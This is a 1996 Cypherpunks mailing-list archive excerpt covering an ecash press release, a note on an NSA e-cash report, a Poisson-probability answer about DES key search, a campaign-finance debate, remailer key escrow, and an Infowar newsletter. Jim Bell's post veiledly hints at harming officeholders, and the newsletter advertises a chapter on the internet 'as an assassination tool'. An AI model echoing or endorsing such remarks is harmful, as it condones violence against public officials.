McDonalds wrapper on the ground, is McDonalds littering?  It is up to us
all to be skating (and biking) ambassadors who educate those who are
beginners about the "rules of the road (trails)".  Just as there are
problems with uncourteous skaters, there are also uncourteous bikers out
there who choose not to follow these rules.

Rollerblade recognized early on the importance of safety education in
creating this sport.  We helped to create and, along with numerous other
in-line skate manufacturers, heavily support an industry wide
organization called the IISA (International In-Line Skating
Association). The IISA has several programs like the Instructor
Certification Program, and the National Skate Patrol that are aimed at
educating skaters.  National Skate Patrol members are much like National
Ski Patrol members with obvious differences based on the specific
activity.  Members skate local parks and trails to be of assistance to
skaters and to educate beginning skaters about safety and "the rules".
The IISA also publishes "Rules of the Road" which gives tips to skaters
about how to legally, and courteously skate. The IISA also helps to
promote our "Asphalt Bites" Campaign which details the importance of
always wearing protective gear while in-line skating. 

In addition to the efforts above, all your comments listed in points "a"
through "g" are covered in the "Rules of the Road" on page 4 of our
Owners Handbook that comes with each pair of Rollerblade skates. I have
listed them below for your reference...
1.  Always wear protective gear: helmet, wrist guards, knee & elbow pads
2.  Take a lesson or learn in-line skating basics, such as controlling
speed, turning, braking, stopping before you skate
3.  Stay alert.  Always skate under control.
4.  Stay away from water, oil, debris, sand and uneven or broken
pavement
5.  Avoid areas with heavy traffic
6.  Observe all traffic regulations
7.  Skate on the right of the path.  When you pass a walker, biker or
another skater, move to the left.
8.  Never allow yourself to be towed by a motorized vehicle or bicycle.
9.  Avoid wearing headphones or anything that makes it hard to hear
10.  Never wear anything that blocks your vision, and never skate at
night or any time it is hard to see.

I hope you come to find that we are as concerned as you about people
enjoying public places and the outdoors.  In most states, skates and
bikes are wheeled vehicles that are subject to the same rules as
motorists.  Educating people to use public places takes an effort on
everyones part.

If you would like us to send a copy of our owners manual or any other
safety information, please email us with your address.

Thanks again...Skate (bike) the World!!!

Webtech5
Rollerblade Consumer Service





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Oct 1996 05:44:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ecash press release
Message-ID: <v0300780bae95119c4e10@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 24 Oct 1996 11:40:27 +1000 (EST)
From: Andreas Furche <afurche@cs.newcastle.edu.au>
To: Tom Wills <twills@commerce.net>
cc: e-payments@commerce.net
Subject: ecash press release
MIME-Version: 1.0
Sender: owner-e-payments@python.commerce.net
Precedence: bulk

+--------------------------------------------------+
Addressed to: e-payments@commerce.net
+--------------------------------------------------+




For General Release
24 October 1996

ADVANCE BANK FIRST TO PROVIDE DIGICASH'S ECASH(tm)
SYSTEM IN AUSTRALIA


Advance Bank and DigiCash Pty Ltd today announced that
Advance will be the first bank in the Asia-Pacific region to
issue electronic cash on the Internet.

Advance will issue ecash denominated in Australian dollars
in a move that will greatly benefit Internet commerce in
Australia by making secure payments on the network a reality.
The system will be piloted with Advance Bank and BankSA
customers and merchants.

Other licensees of the ecash system include Mark Twain
Bank (USA), Deutsche Bank (Germany), Merita Bank/EUnet
(Finland) and Posten (Sweden).

Currently, shopping on the Internet usually requires the
sending of credit card details over computer networks but
credit card transactions are relatively expensive and therefore
are not efficient for low value purchases.

DigiCash's patented ecash system allows payment of
amounts as low as one cent, and all payments are made with
the security technology currently used by large financial
institutions for international money transfers.

"This launch in Australia represents an important collaboration
between the premier electronic cash company and the leading
Internet bank in a country that is very advanced in Internet
usage," said Dr. David Chaum, inventor of electronic cash and
founder of DigiCash. He added "Internet users have come to
understand the unique ability of the ecash electronic cash
system to empower them, using their own computers, to
protect their own privacy. And leading banks in the region, and
globally, are beginning to observe this and see the strategic
importance of operating their own electronic cash systems."

"Advance Bank is reinforcing its position as Australia's leading
Internet bank with this move.  Our customers can already use
Internet Banking to access statements of accounts, transfer
money between accounts and pay bills. Now, Internet Banking
will be complemented by electronic cash, realising the concept
of the virtual ATM on the Internet," said David Brown,
Advance's head of Public Affairs.

Ecash is the only Internet payment system that creates
actual electronic cash. This concept increases security and
reduces transaction costs. It gives more control to the user of
the system and provides consumer privacy.  It  also helps the
merchant, as payments are authenticated and finalised at the
time of purchase, avoiding uncertainty and delays in payment.

The system is a great opportunity for merchants selling low
cost goods, information and services online.

Andreas Furche, Managing Director of DigiCash Pty Ltd, said:
"This is particularly good news for companies wanting to sell
digital goods such as information, software, or database
access. These merchants can set up shops that automatically
provide services and collect money.

"Since even low value payments are possible, newspapers
could, for example, sell digital versions of their different
sections separately, so that the user could choose to buy only
the business and the sport sections, or even single articles at a
time," he said.

Advance Bank and DigiCash Pty Ltd expect to make ecash
available to users of Advance Bank's Internet Banking system
by Christmas.

Advance Bank has prepared an information kit for merchants
and companies interested in selling their goods and services
for electronic cash over the Internet.  This can be obtained
from Advance's web site at:
www.advance.com.au/advance/ecash/

Further Information:

David Brown
Advance Bank
Head of Public Affairs

Telephone:	02 9236 1050

Andreas Furche
Managing Director
DigiCash Pty Ltd

Telephone:	02 9375 2316


DIGICASH BACKGROUND - www.digicash.com

History and Mission

Since beginning operation in April 1990, DigiCash's mission
and primary activity has been: to develop and license payment
technology products - chip card, software only, and hybrid--
that both show the true capability of technology to protect the
interests of all participants and are competitive in the market.

Founder

Dr David Chaum, Chairman of DigiCash, received his Ph. D.
in Computer Science from the University of California at
Berkeley.  He taught at New York  University Graduate School
of Business Administration and at the University  of California,
and headed the Cryptography Group at CWI, the Dutch
nationally- funded centre for research in mathematics and
computer science, before taking his current position. He has
published over 45 original technical articles on cryptography
and also founded the International Association for Cryptologic
Research.

DigiCash Products

Blue: smart card technology for EMV 7 prepaid with
dynamic public key

Conforms to joint Europay, Mastercard, Visa specifications;
multiple applications, including loyalty and closed systems;
superior data integrity in case of malicious/accidental
interference/interruption; requires only the smallest and most
proven chips, e.g. SC-24 or ST601; mask technology
licensing.

Cafe: smart card and card-accepting electronic wallet
project

Consortium of 12 other members founded and chaired by Dr.
Chaum of DigiCash; simulation, mask and first readers
developed by DigiCash; technology trial at the EC
headquarters building in participation with related open special
interest group and partially funded by the EC.

DyniCash highway-speed road-toll collection system
using smart cards

Chip card inserts into battery-powered dashboard unit;
reflected backscatter microwave technology by industry leader
Amtech; prepaid mode has user privacy; open and/or closed
pricing schemes; tested extensively in Japan; non-exclusive
licensing of the payment technology.


Ecash* software only electronic cash system for
Internet/email

Users download software that can make and receive
payments; protects users' money like travellers cheques and
privacy like coins; now operational after testing by over twenty
thousand users world-wide; Macintosh, MS-Windows and X-
Windows; any WWW browser; currently   Mark Twain Bank
issues ecash* in US dollars and Merita/EUnet issues digital
Finnish marks; Deutsche Bank has licensed ecash* to issue
electronic Deutsche Mark.  Posten has announced their
license and intention to issue Swedish Kroner.

Facility Card: complete facility management, smart-
card/reader system

Cash replacement, access control, and time/attendance
system; now in schools, hospitals, industry, offices, recreation;
interfaces to vending, point-of-sale, access control, copiers,
phones, gaming; downloadable 7 upgradeable readers work
on-line and/or off-line; over 100k cards in use in the
Netherlands; Mars Electronics International will launch it
globally later this year.



How does ecash* work?

Using ecash* is like using a virtual ATM (Automatic Teller
Machine). When you connect over the Internet and
authenticate your ownership of the account, you can withdraw
money electronically. Instead of giving you bank notes, you
are given digital cash which your software can store on your
PC's hard disk.

When you want to make a payment, you simply confirm the
amount, payee and description of goods.  Then with a mouse
click you tell your ecash* software to transfer cash of the
correct value from your PC direct to the payee. Merchants
(ranging from casual participants in the global Internet bazaar
to mega-retailers) can then deposit the digital cash into their
accounts.

Behind the user interface, your computer actually creates
'serial' numbers for the electronic cash based on a random
'seed'. Then it hides them in special encryption 'envelopes',
sends them to the electronic bank for 'signature' and, when
they are returned, removes the 'envelopes' (retaining the
bank's validating digital signature on the 'serial' numbers). This
way, when the bank eventually receives your cash, it cannot
recognise them as coming from any particular withdrawal or
account' because all cash are hidden from the bank during the
withdrawal process. Therefore the bank cannot know when or
where you shop, who you pay or what you buy.

The serial number of each signed coin is unique, so that the
bank can be sure that it never accepts the same coin twice. If
you wish to identify the recipient of any of your payments, you
may reveal the unique coin number and use your ecash*
software to prove that you created it and set the bank to
confirm who deposited it. Your software can also re-create the
serial numbers and 'envelopes' from the 'seed' that you wrote
down when installing your account, thereby allowing all your
cash to be re-created if your PC fails.

How safe is Ecash*?

Security is fundamental to electronic cash. The cryptographic
coding that protects every 5 cent ecash payment is the same
as that routinely relied upon for authenticating requests to
move huge sums between banks and even for national
security. But in principle ecash goes beyond such
communications security to achieve true multiparty security;
no one (buyer, seller, bank) can cheat anyone else, no matter
how they might modify their own software. Even if two parties
collude, they cannot cheat the third.

Replacing paper and cash with ecash* would make life
harder for criminals. Because the payer's computer chooses
the 'serial' numbers of the cash as mentioned above), users
can identify receivers of their ecash*. Moreover, the privacy
which ecash offers would be essential to widespread
acceptance of any electronic payment system.


--
Andreas Furche					Level 29 Chifley Towers
Managing Director				2 Chifley Square
DigiCash Pty. Ltd.				Sydney 2000, Australia
e-mail: andreas@digicash.com			ph  +61 2 375 2316
mobile (0419) 385 569 (NEW number!)		fax +61 2 375 2121


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message was sent by e-payments@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 24 Oct 1996 06:54:55 -0700 (PDT)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: NSA Report: Anyone seen this?
Message-ID: <v01510101ae95249e194c@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Just got off the phone with the NSA.

"There are so many places in the NSA that deal with cryptology
we haven't been able to find the document yet. We'll call you
back once we locate it and let you know if it can be released
or not. We've been getting phone calls about the document. Did
you read about it on the Internet?"

-Declan


>--- begin forwarded text
>
>
>Mime-Version: 1.0
>Date: Wed, 23 Oct 1996 16:50:18 -0700
>From: Somebody
>Subject: NSA Report
>To: rah@shipwright.com
>
>     I don't recall seeing this report mentioned in any e$pam items, and
>     thought you might be interested.  Thanks for all your work on the e$
>     lists.
>
><Somebody's .sig>
>
>______________________________ Forward Header
>__________________________________
>Subject: 21st Century Banking Alert No. 96-10-17
>Author:  "Ledig; Robert" <LEDIGRO@ffhsj.com> at internet
>Date:    10/17/96 2:51 PM
>
>
>
>21st Century Banking Alert No. 96-10-17
>October 17, 1996
>
>National Security Agency Report Raises
>Systemic Security Issues Related to Anonymous Electronic Money
>
>
>     A recent report prepared by the Cryptology Division of the National
>Security Agency's Office of Information Security Research and Technology
>discusses the potential for security failures in certain electronic cash
>systems and their likely consequences.  While demonstrating concern over the
>attributes of non-traceable electronic money, the report points out methods
>that may be used to minimize security breaches and losses, including
>limiting the number of coins that can be affected by a single compromise,
>requiring traceability for large transactions or large numbers of
>transactions in a given period, and the creation of a mechanism to restore
>traceability under certain circumstances.  The report contains an excellent
>summary of basic electronic money cryptographic tools, electronic cash
>protocols, authentication and signature techniques and related security
>issues.
>
>
>
>Copyright 1996.  Fried, Frank, Harris, Shriver & Jacobson.
>  All rights reserved.
>21st Century Banking Alert is a trademark and servicemark
>  of Fried, Frank, Harris, Shriver & Jacobson.
>
>
>
>--- end forwarded text
>
>
>
>-----------------
>Robert Hettinga (rah@shipwright.com)
>e$, 44 Farquhar Street, Boston, MA 02131 USA
>"The cost of anything is the foregone alternative" -- Walter Johnson
>The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 24 Oct 1996 09:47:31 -0700 (PDT)
To: "cypherpunks@toad.com
Subject: Re: probability question for math-heads
In-Reply-To: <326EAA23.2DB1@best.com>
Message-ID: <v03007803ae95511957ea@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 PM +0000 10/23/96, geeman@best.com wrote:
>I'm too tired &/or busy to work this out, via Knuth --- maybe you can
>help, with some implications for the DES keysearch strategy.
>
>What is the expected distribution, in a "random" binary sequence  --
>with all the fuzziness that implies as to what _exactly_ is "random" --
>of gaps between runs of same-bits.
>
>i.e. what is the expected distribution of sequence length between
>occurances of two (and only two) 1-bits in a row?  how about sequences
>of 3 1-bits?  ETc.
>
>We know that in a _truly_ random sequence, taken over a long enough
>period, there should be all possible values of "gaps".  But what is
>reasonable to expect in a "random" sequence as to how those gaps are
>distributed?  Is my question equivalent to Knuth's gap test?

It obviously depends on your definitions of period, gap, clusters,
patterns, etc. These would have to be pinned down before a precise answer
could be given. For example, if the sequence is 30 digits long, or 5 digits
long, etc.

But the general _framework_ for looking at this problem would probably be
the Poisson distribution. That is, if the _expected_ ("average") number of
gaps, runs, whatever, is "m", then the number "s" of actual gaps/runs that
is 0, 1, 2, 3, 4, ...., n, is given by the Poisson distribution:

P [s; m] = (exp (-m))  (m ^ s)  / (s!)

(I read this like this: "The Poisson probability of seeing s occurrences
given that m are expected is e to the minus m times m to the s divided by s
factorial." I literally remember the formula from this verbal pattern,
having used it much in my earlier career.)

Thus, if one _expected_ to see m = 3 occurrences of some event, then one
would likely see 0 occurences (exp (-3))  (3 ^ 0)  / (0!) = 0.0497 = 5% of
the time, to see 1 occurrence (exp (-3))  (3 ^ 1)  / (1!) = 0.149 = 15% of
the time, to see 2 occurences (exp (-3))  (3 ^ 2)  / (2!) = 0.224 = 22.4%
of the time, and so on, even having a chance of seeing s = 10 occurences
given by:

(exp (-3))  (3 ^ 10)  / (10!) = 0.00081

As expected, the cumulative probability of all the occcurrences is 1.00.
(In fact, the Poisson distribution can be derived from some very basic
considerations, such that the sum of all outcomes must be 1, and that the
past history of occurrences does not effect the next outcome.)

In this example, I would put the expected value of the "gap" between the
same values (e.g., gap between 1s, gap between 0s) at exactly 0.5, for this
random sequence. (This is the weakest part of this post, as it's possible
I'm falling into a kind of trap by putting the expected value at one half.
If anyone thinks differently, e.g. that it should be "1," we can discuss
this. But the framework is otherwise unchanged.)

Thus,

P [0; 0.5] = (exp (-m))  (m ^ s)  / (s!) = 0.6065

P [1; 0.5] = (exp (-m))  (m ^ s)  / (s!) = 0.3033

P [2; 0.5] = (exp (-m))  (m ^ s)  / (s!) = 0.0758

P [3; 0.5] = (exp (-m))  (m ^ s)  / (s!) = 0.0126

P [4; 0.5] = (exp (-m))  (m ^ s)  / (s!) = 0.0016

etc.

There are other ways of looking at this situation, such as the binomial
expansion (e.g., Pascal's triangle), but the results should be the same.
(Of course, as they all are interrelated.)

(In particular, for various "clumps" and "clusters" of bits in a random
distribution, e.g., "how often does the pattern "101111011" occur in random
sequences of length 30," one could explicitly calculate the permutations
and combinations, exactly as one would calculate hands of poker or bridge,
a well-known easy problem in statistics and probability.)

I like the Poisson approach as a first cut because it works for any form of
a random process where some value is "expected" and one wants to know the
distribution of "actuals." Clicks on a Geiger counter in some period,
number of persons ahead of one in a supermarket checkout line, number of
Prussian soldiers kicked to death each year by their horses, etc.

The Poisson also works for finite distributions, e.g., a sequence of 10
digits, whereas Gaussian probabilities are best for continuous/unlimited
distributions. (In the limit, of course, they are the same.)

I hope this helps.

(BTW, the Poisson distribution is what I used several months ago to show
that the probability of finding a key with a random search (no coordination
between various searchers) is sufficiently high. If the _expected_ value of
finding the key is say "1" (effort the same as coordinated search), then
the probability of _not_ finding the key is given by P [0; 1] = exp (-1) =
36.8%. If twice the effort is put into this, then P [0; 2] = exp (-2) =
13.5%, and so on. So, with several times the effort, the probability the
key has not been found is low.)
--Tim May










"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 24 Oct 1996 10:13:38 -0700 (PDT)
To: mjmiski@execpc.com
Subject: Re: Stopping the buying of candidates
Message-ID: <199610241713.KAA03777@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 AM 10/24/96 +0000, Matthew J. Miszewski wrote:
>> While I have worked through essentially none of the details, if the system 
>> can be implemented well enough, all this kind of information will be 
blinded 
>> into oblivion.  Donations won't be tallied individually, and news of their 
>> arrival will be disguised, possibly by limiting the size that is credited 
to 
>> the candidate per day and thus in effect splitting up a donation to make it 
>> "arrive" over a period of a week or two.  Only overall totals will be 
>> reported, possibly rounded to only two significant figures, and even then 
>> possibly only on a weekly basis.   
>
>Politicians need money to pay bills.  If you are cutting off all 
>prediction of money appearing (which is impossible unless you get rid 
>of all special interests) no campaign can ever have the ability to 
>plan. 

No, I didn't say I was "cutting off all prediction of money appearing."   
But it would be a long shot from having particular donor's names associated 
with particular dollar figures.  And, the system would simply have to 
adjust.  Campaigns would have to adjust their spending to match the current 
realities, and donors would have to recognize that they're going to have to 
donate a bit earlier to accomodate the delay.


>This is a major part of all campaigns.  Resistance to this 
>will be high (not that this wasnt expected.)
>
>> >> The candidate still gets the money, of course, and the contributor is 
still 
>> >> free to both donate and speak...separately.  The thing that's been cut 
off 
>> >> is the association between the money and the speech...which is exactly 
what 
>> >> the problem is, isn't it?
>> >
>> >See above for why the connection is not.
>> 
>> Try again.  Rather than trying to prove that a system won't work, why not 
>> help develop one that will?
>
>Why don't you run for office.  I did.  Reality, after all, is far 
>better than theory.

I'd prefer doing something far more...uh...permanent than to merely REPLACE 
officeholders.


>> But "vote delivery" can't be proven, or even demonstrated with a strong 
>> degree of assurance.  
>
>Every candidate ever endorsed by the Firefighters Union in my town 
>have been absolutely elected.  Looking at the firefighters voting 
>records and matching with their addresses shows a distinct pattern of 
>voting in almost every election. 

"Firefighter's voting records"?  I _thought_ we had a secret ballot in this 
country.  Maybe you're from some  town that I don't know about!

Besides, what you're saying can be considered a bit of self-fulfilling 
prophecy.  Some cities ALWAYS vote one way, or another.  Over time, public 
employees simply adjust their politics to match their wallets, etc.  
Remember, these are PUBLIC employees after all, which really just means the 
employeees of the thugs who get into office.  It does not serve their 
interests to go against the winning candidate.  If, one year, the party 
normally out of office appears to be winning, the Firefighters will simply 
adjust their politics accordingly.  Simple.

> They have sufficient numbers to win every time.

Whichever candidate wins, "has sufficient numbers to win."  Tell me 
something else I don't know.


>> What I consider wrong is that government affects way too large a fraction 
of 
>> our lives, without apparent Constitutional justification.  If the 
government 
>> at all levels were only, say, 1/10th of its current size, there would be 
>> much less motivation for corruption.  
>
>Power currupts.  Not size of governement. 

Size of government is evidence of the size of the corruption.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 24 Oct 1996 10:17:13 -0700 (PDT)
To: WEB Tech #5 <CYPHERPUNKS@toad.com>
Subject: Re: In-Line Skating Safety and Courtesy
In-Reply-To: <c=US%a=_%p=Rollerblade._Inc%l=EXCHANGE-961024131748Z-1310@mail.rollerblade.com>
Message-ID: <v03007800ae9564853739@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I sent a note to WEB Tech #5 <webtech5@rollerblade.com> advising them that
the Cypherpunks mailing list is the wrong place for announcements like this
one.

I got a nice reply back, saying someone had given "cypherpunks@toad.com" as
the address to which info should be sent. He said he'd remove us from any
lists.

And he expressed some interest in what we're all about, so I sent him
instructions on subscribing and unsubscribing (which I'll include below,
just for anyone out there who needs it).

Nice to get a good reply back (I sent many requests to Cyberpromo/savetrees
and only received more auto-replies and more spam).

--Tim May


To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Anthony" <BUTLERA2@anz.com>
Date: Wed, 23 Oct 1996 22:32:32 -0700 (PDT)
To: sd <proff@suburbia.net>
Subject: No Subject
Message-ID: <c=AU%a=_%p=ANZ%l=ANZINETDMZ/MELINETDMZ/000D6F70@gtwau300.anz.com>
MIME-Version: 1.0
Content-Type: text/plain


22/10/96

WASHINGTON - US First lady Hillary Rodham Clinton unveiled a new
Superman comic book for Bosnian children during an East Room ceremony
Monday. The comic book, written in three languages, shows the
mythical American hero flying down to save two little boys in Bosnia-
Herzegovina. The comic books will be distributed throughout the
country. With several Bosnian children standing nearby, Mrs. Clinton
pulled the drape on a blown-up reproduction of the cover of the comic
book. Mrs. Clinton said the initiatives show the United States'
"clear commitment to the people of Bosnia-Herzegovina." She said
"Superman wlll bring a special message" to the Bosnian children.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 24 Oct 1996 08:14:48 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: "Countless third world deaths"--who cares?
Message-ID: <9609248461.AA846180758@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Hard Media <zaid@hardnet.co.uk> wrote:
>Citibank is a major player in the third world debt crisis.
[Thomas Bass interviewing Citibank's Walter Wriston] 
> goes on to ask if "Walter" has made any "bad loans" ie to 
>dictators and other nasty sorts
>...jeez sorry but there's naivity and there's stupidity 

"Timothy C. May" <tcmay@got.net> wrote:
>Money was lent for economic development projects...some worked,
>some didn't.  Lenders of money don't "cause" deaths. People are
>responsible for their own actions, mostly. If their governments are
>corrupt, they need to replace those governments.
 
 In Re: Stopping the buying of candidates
"Timothy C. May" <tcmay@got.net> wrote
>Our political system is already in thrall to various special interests;
> [...] So be it. Let the highest bidder buy the government he can.
 
In RE: wired wankers
Dale Thorn <dthorn@gte.net> wrote: 
>These are very serious folks [Wriston et al.]. [...] 
> Don't get in their way unless you have an angel on your side.  
>An angel with a bag of cash, actually.
 
In Re: Timmy May is a jerk
"Timothy C. May" <tcmay@got.net> wrote:
>I guess I'm not much of a joiner. I never donated to the United Way
 
"Timothy C. May" <tcmay@got.net> wrote:
>If this sounds harsh, so be it. 
>Cypherpunks is not about redistributing wealth. 

Ahh, but you don't really believe this. Your vision of cypherpunks is all about
redistributing wealth. Just not in the sense you speak of.

There is naivete and then there is complicity.

James

"Timothy C. May" <tcmay@got.net> wrote:
>People are responsible for their own actions, mostly.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Thu, 24 Oct 1996 11:23:14 -0700 (PDT)
To: tcmay@got.net
Subject: Re: Netescrow & Remailers?
Message-ID: <199610241823.LAA02877@crypt>
MIME-Version: 1.0
Content-Type: text/plain


Up until now, when remailers have gone down it has not been in a
circumstance in which escrow would help much.  Generally they are
taken down voluntarily or at the request of someone in authority
(the owner of the computer they are running on, in many cases!).
In these situations there would not be a problem in transferring
the key to someone else.

There have been a couple of times, particularly early in a given
remailer's life, where people have clumsily deleted their remailer's
key and had to create a new one.  In such a circumstance a secure
backup capability would be useful.  But you don't really need the
kinds of recovery that Matt's idea provides.

Conceivably a remailer operator could be dragged off in chains, but
it doesn't seem like a very probable scenario.  Even then more
traditional secret sharing based distributed backups would seem like
a better fit than "net escrow".  The main distinguishing feature of
the latter is that society as a whole can choose to release a key
without the owner's approval, but not any lesser group.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Thu, 24 Oct 1996 09:33:13 -0700 (PDT)
To: jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610241632.LAA02453@earth.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> >"Wink, wink.  Nudge, nudge, Senator.  Look at your account balance 
> >tomorrow.  Never forget the National Association of Manufacturers was 
> >there for you"  (Obviously a completely random selection 8-)

> While I have worked through essentially none of the details, if the system 
> can be implemented well enough, all this kind of information will be blinded 
> into oblivion.  Donations won't be tallied individually, and news of their 
> arrival will be disguised, possibly by limiting the size that is credited to 
> the candidate per day and thus in effect splitting up a donation to make it 
> "arrive" over a period of a week or two.  Only overall totals will be 
> reported, possibly rounded to only two significant figures, and even then 
> possibly only on a weekly basis.   

Politicians need money to pay bills.  If you are cutting off all 
prediction of money appearing (which is impossible unless you get rid 
of all special interests) no campaign can ever have the ability to 
plan.  This is a major part of all campaigns.  Resistance to this 
will be high (not that this wasnt expected.)

> >> The candidate still gets the money, of course, and the contributor is still 
> >> free to both donate and speak...separately.  The thing that's been cut off 
> >> is the association between the money and the speech...which is exactly what 
> >> the problem is, isn't it?
> >
> >See above for why the connection is not.
> 
> Try again.  Rather than trying to prove that a system won't work, why not 
> help develop one that will?

Why don't you run for office.  I did.  Reality, after all, is far 
better than theory.

> But "vote delivery" can't be proven, or even demonstrated with a strong 
> degree of assurance.  

Every candidate ever endorsed by the Firefighters Union in my town 
have been absolutely elected.  Looking at the firefighters voting 
records and matching with their addresses shows a distinct pattern of 
voting in almost every election.  They have sufficient numbers to win 
every time.

> What I consider wrong is that government affects way too large a fraction of 
> our lives, without apparent Constitutional justification.  If the government 
> at all levels were only, say, 1/10th of its current size, there would be 
> much less motivation for corruption.  

Power currupts.  Not size of governement.  I agree we need to shrink 
our gov't a whole lot.  I believe whole heartedly in the 
Constitution.  I advocate the entire Bill of Rights.  I also support 
meaningful campaign finance reform.  But ya know what?  I lost.

Change doesn't depend on changing finance laws.  Much as in nature, 
these people will always find a way around it.  It depends on helping 
people empower themselves.  Making them know their vote DOES count.  
People who want real reform should fight actively for it.

> Jim Bell
> jimbell@pacifier.com

Matt 
++++==============----------------------------
Matthew J. Miszewski |The information revolution has changed wealth: 
		     |intellectual capital is now far more important 
mjmiski@execpc.com   |than money.		-Walter Wriston
                         ----------------------------==============++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Betty G. O'Hearn" <betty@infowar.com>
Date: Thu, 24 Oct 1996 08:34:00 -0700 (PDT)
To: news_from_wschwartau@infowar.com
Subject: New On WWW.Infowar.Com  Vol I  #3
Message-ID: <1.5.4.32.19961024153400.00715da4@mail.infowar.com>
MIME-Version: 1.0
Content-Type: text/plain


New On WWW.Infowar.Com  Take a look. Pass it on.


                               We thank our sponsors:

                         National Computer Security Association
                            Open Source Solutions
            New Dimensions International - Security Training
                           Secure Computing Corporation
                           HOMECOM Communications



There is a lot included in this newsletter including the RELEASE DATE of
Winn Schwartau's new book., "Information Warfare Cyberterrorism:  Protecting
Your Personal Security In the Electronic Age."

_____________________________________________________________

On www.infowar.com:
What's New

 **December 2, 1996** deadline and call for papers for the 1997
          IEEE Symposium on Security and Privacy

   In Russia, they don't have Ghost Busters!!

   They say they've figured out how to crack DES and other crypto
        services. You have to read this important announcement.

   DoctrineLINK - the most comprehensive online guide to military
        doctrine currently available.

   PKZip Trogan Horse.... Distribute to your security personnel.

   Beware of the Answering Machine Scam!!! 

   Read about the  The Internet II Project which  has  begun.

   HOW THE CIA COMBATS INTERNATIONAL TERRORISM

   HUMINT STILL MOST IMPORTANT WHEN THWARTING
        TERRORISTS

   Deputy Attorney General speaks on computer terrorism

   SPA vs. Site with Hack links? Private Big Brother?

   Memorandum on 'Arab Intranet' to be signed next week.

   Phone Scams on the Rise $100 Return Phone Calls?

   E-Mail Bomber Prosecuted

*************************************************************

              Great News!    You Asked Us For It!    It is ON THE WAY!!!  

*************************************************************
Archives of C4I

   Inforwar.com has received permission to mirror the entire archive of the
list C-4I.  For those of you not familiar with this communication, C4I-Pro
is an unofficial list run in a DoD school environment in the interest of an
academic exchange of information and ideas as a means for advancement of C4I
related issues.  These archives will add value  in your searches.  
  
*************************************************************

                      Announcing a new list:   Infowar@infowar.com

Many of you have signed up for this discussion group thru the web site.
This list is about to be launched with in the next 10 days.  If you have not
signed up, go over to http://www.infowar.com and add your name and info! 

*************************************************************

              Announcing Winn Schwartau's New Book - 
         
"Information Warfare - Cyberterrorism:  Protecting Your Personal Security In
the Electronic Age" BY WINN SCHWARTAU
Thunder's Mouth Press, New York. 212.780.0380 
ISBN:  1-56025-132-8
Released Date:  October 30, 1996.


WINN Schwartau's second book on IW, "Information Warfare - Cyberterrorism:
Protecting Your Personal Security In the Electronic Age" is a *must* have,
inclusive update  on the subject.   You will want this book in your library
of Information Warfare AND INFORMATION SECURITY genre.

ABOUT 1/3 of this book is taken from the original work on the subject,
"Information Warfare - Chaos on the Electronic Superhighway". 
( ISBN: 1-56025-080-1)  1994.

Schwartau has added substantial material that brings us current in the
EVOLUTION of the field of IW.  

In addition over thirty contributions from an international collection of
authors with excellent and CONTROVERSIAL pieces relevant to the field.

FOR EXAMPLE, THE TRUE STORY OF PGP AND PHIL ZIMMERMANN FINALLY COMES TO
LIGHT. A GREATLY EXPANDED SECTION ON DIRECTED ENERGY WEAPONS CLEARS UP MANY
MISUNDERSTANDINGS. A HIGHLY CONTROVERRSIAL PIECE IS ON HOW TO USE THE
INTERNET AS AN ASSASSINATION TOOL. THE CONTRIBUTIONS SPAN FROM MILITARY TO
CIVILIAN TO ANARCHIST.

THE DISTINGUISHED Dr. John Alger, National Defense University authored the
